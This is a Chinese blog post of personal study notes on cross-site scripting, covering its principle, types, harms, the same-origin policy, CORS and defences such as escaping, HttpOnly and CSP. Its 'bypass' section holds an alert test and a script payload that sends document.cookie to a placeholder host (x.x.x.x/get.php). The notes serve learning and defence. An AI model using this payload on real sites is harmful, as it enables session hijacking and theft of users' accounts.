XSS小结

已于 2024-05-20 23:37:59 修改
阅读量440 收藏 9
点赞数 7
分类专栏: 个人网络安全笔记 文章标签: web安全
于 2024-03-04 20:30:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61475980/article/details/136449613
版权

1.原理

网站对用户输入过滤不足,攻击者可以输入恶意前端代码到网页,从而达到攻击者的特殊目的,如 cookie窃取等。

2.漏洞点

任何有参数输入的地方都可能有xss

3.分类

反射性XSS 存储型XSS DOM型XSS等

4.危害

前端代码能做的事,xss都能做,钓鱼,cookie,弹广告,配合csrf

网络钓鱼,包括获取各类用户账号;
窃取用户 cookies 资料,从而获取用户隐私信息,或利用用户身份对网站执行操作;
劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;
强制弹出广告页面、刷流量等;
网页挂马;
进行恶意操作,如任意篡改页面信息、删除文章等;
进行大量的客户端攻击,如 ddos 等;

5.同源策略

协议相同 主机相同 端口相同

JSONP跨域:A向B发送请求,B将A所请求的信息封装为JSON返回

CORS是一个W3C标准,全称是"跨域资源共享",它允许浏览器向跨域服务器,发出 XMLHttpRequest请求,CORS通信过程浏览器自动完成,不需要用户参与。

6.绕过

<script>alert("xss");</script>

<script>window.location.href='http://x.x.x.x/get.php?c='+document.cookie< /script>

https://xz.aliyun.com/t/4067

7.防御

1.纯前端渲染
2.过滤一些关键字,以及过滤或转义& < > " ' /等危险字符,如xss转义<>,则会放弃该xss漏洞点
3.设置HTTP-only,禁止JavaScript获取敏感 Cookie
4.设置CSP(Content Security Policy),以白名单的形式配置可信任的内容来源

参考

xss漏洞学习小结 - FreeBuf网络安全行业门户

https://xz.aliyun.com/t/4067

『 』785
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss小结
Hydra的博客
11-20 868
首先看一下题目,题目说alert出xss三个字母,才会有flag 输入 xss123输出123,说明小写xss被过滤了 绕过方法一 编码绕过 &lt;script&gt;alert(String.formCharCode(120,115,115))&lt;/script&gt; 还可以把&lt;script&gt;alert("xss")&lt;/script&gt; hex编码绕...
XSS简述
qq_62098017的博客
09-20 2158
绕过推荐 XSS绕过可以看看该文章:XSS过滤绕过速查表 0.介绍 跨站攻击,即Cross Site Script Execution(通常简写为XSS),是前端的漏洞,产生在浏览器一端的漏洞。它是指攻击者在网页中嵌入客户端脚本,主要利用js编写的恶意代码来执行一些想要的功能,也就是说它能干嘛是受到js的控制,那么js能执行出什么脚本代码就取决于它能干嘛。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。 0.1.能干嘛 常规用到的是盗取cookie、js做钓鱼攻击、流
XSS 小结
乔二爷
09-14 577
前言 上一篇文章中写了关于项目中处理SQL盲注的安全漏洞.其中也提到了XSS. 这篇文章就来说一下XSS 是怎么来进行攻击的,如何对其进行防御. 概览 XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆, 故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全
XSS详解
聚鼎安全
01-20 565
目录XSS简介XSS漏洞分类XSS漏洞攻击过程XSS漏洞危害XSS漏洞的挖掘XSS利用方式XSS过滤绕过XSS防御方式XSS工具手工挖掘工具自动化工具 XSS简介 跨站脚本攻击—XSS(Cross Site Script),是指攻击者通过在Web页面中写入恶意脚本,造成用户在浏览页面时,控制用户浏览器进行操作的攻击方式,该漏洞发生在用户端,在渲染过程中发生了不在预期过程中的JavaScript代码执行。假设,在一个服务端上,有一处功能使用了这段代码,他的功能是将用户输入的内容输出到页面上,很常见的一个功能。
Web安全XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
xss基本原理分析
03-17
**XSS(跨站脚本攻击)基本原理分析** XSS,全称为Cross-Site Scripting,是一种常见的网络攻击方式,主要针对Web应用程序。这种攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户的敏感信息,如登录凭证、...
PHP 编程安全小结
12-17
- 对所有输出进行适当的转义或过滤,防止跨站脚本(XSS)攻击。 - 避免硬编码敏感信息,如数据库连接凭据,而应使用环境变量或安全配置文件。 通过遵循这些原则和最佳实践,开发者可以显著提高PHP应用的安全性,...
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1134
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
网络安全领域___专研者.
07-19 545
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1241
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 467
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 922
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
如何保护你的网络安全
m0_70655343的博客
07-15 759
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络安全-网络安全及其防护措施4
LS_Ai的博客
07-15 958
网络故障排除是检测、诊断和解决网络问题的过程。通过系统的方法,确保网络的稳定性和可用性,减少故障对业务的影响。有效的网络故障排除可以减少停机时间,提高网络的可靠性和性能,确保业务的连续性。网络监控是持续监控网络设备和流量,收集和分析性能数据的过程。通过实时监控,可以及时发现和解决网络问题,确保网络的高可用性和稳定性。负载均衡是一种通过分配网络流量或计算任务到多个服务器或设备的方法,以提高系统的性能和可靠性。负载均衡器可以在不同的服务器之间均匀分配负载,避免单点故障,提高系统的可用性和响应速度。
网络安全-网络安全及其防护措施5
LS_Ai的博客
07-16 991
互联网交换点(IXP)是一个物理基础设施,通过它,互联网服务提供商(ISP)和内容提供商可以互相交换互联网流量。IXP的目的是提高网络性能、降低带宽成本和减少流量延迟。网络虚拟化是通过软件定义的方式,将物理网络资源抽象为虚拟资源,以提高网络的灵活性、可管理性和资源利用率。网络虚拟化可以实现网络功能的自动化部署和管理,适应动态变化的业务需求。网络带宽管理是通过监控和控制网络带宽的使用,优化网络性能并确保关键应用的带宽需求。带宽管理有助于防止网络拥塞,提高网络效率,保障服务质量(QoS)。
数据分析的核心技能和方法
最新发布
07-19
数据分析的核心技能和方法
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包
07-19
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 平湖人寿保险公司保险销售网站分为用户和管理员两个部分 前台部分(用户界面): 1、资讯浏览功能: (1)新闻资讯浏览 (2)新闻资讯查询 (3)公司简介 (4)通知公告 2、用户登录注册功能: (1)注册 (2)登录 3、用户管理功能 (1)个人信息管理 (2)订单管理 4、保险购买功能: (1)保险产品浏览 (2)保险产品查询 (3)保险产品购买 后台管理(管理员界面) 1、管理员登录功能: 管理员在管理员登录界面输入用户名和密码,即可登录管理员的界面。 2、资讯管理功能: (1)新闻资讯管理 (2)公司简介管理 (3)通知公告管理 3、保险产品管理: (1)保险产品信息管理 (2)保险产品查询 4、会员管理: (1)会员删除 (2)会员级别管理 5、统计管理: (1)保险产品销售量统计 (2)有效会员数量统计 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程
dvwa靶场通关小结
06-29
小结如下: 1. **理解漏洞类型**:DVWA模拟了各种常见的漏洞场景,让你了解如何利用错误处理、输入验证不足等问题来执行攻击。 2. **实战演练**:通过动手操作,尝试对网站进行攻击,比如在注册表单中注入SQL查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值